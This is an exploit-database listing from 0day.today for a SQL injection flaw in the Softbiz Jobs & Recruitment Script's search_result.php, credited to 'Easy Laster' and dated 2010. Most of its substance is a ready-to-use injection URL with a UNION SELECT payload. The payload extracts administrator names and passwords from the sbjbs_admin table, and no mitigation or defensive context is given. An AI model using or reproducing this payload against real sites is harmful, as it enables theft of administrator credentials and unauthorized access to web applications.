[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Softbiz Jobs / Recruitment Script (search_result.php) SQL Injection

Author
Easy Laster
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11246
Category
web applications
Date add
10-03-2010
Platform
unsorted
=================================================================================
Softbiz Jobs / Recruitment Script (search_result.php) SQL Injection Vulnerability
=================================================================================

----------------------------Information------------------------------------------------
+Name : Softbiz Jobs & Recruitment Script SQL INJECTION search_result.php
+Autor : Easy Laster
+Date   : 10.03.2010
+Script  : Softbiz Jobs & Recruitment Script
+Price : 129$
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/sbjbs/search_result.php?cid=
+Exploitable   : http://www.site.com/sbjbs/search_result.php?cid=9999999+union+select+1
,concat(sb_admin_name,0x3a,sb_pwd),3,4+from+sbjbs_admin#
-----------------------------------------------------------------------------------------



#  0day.today [2024-11-15]  #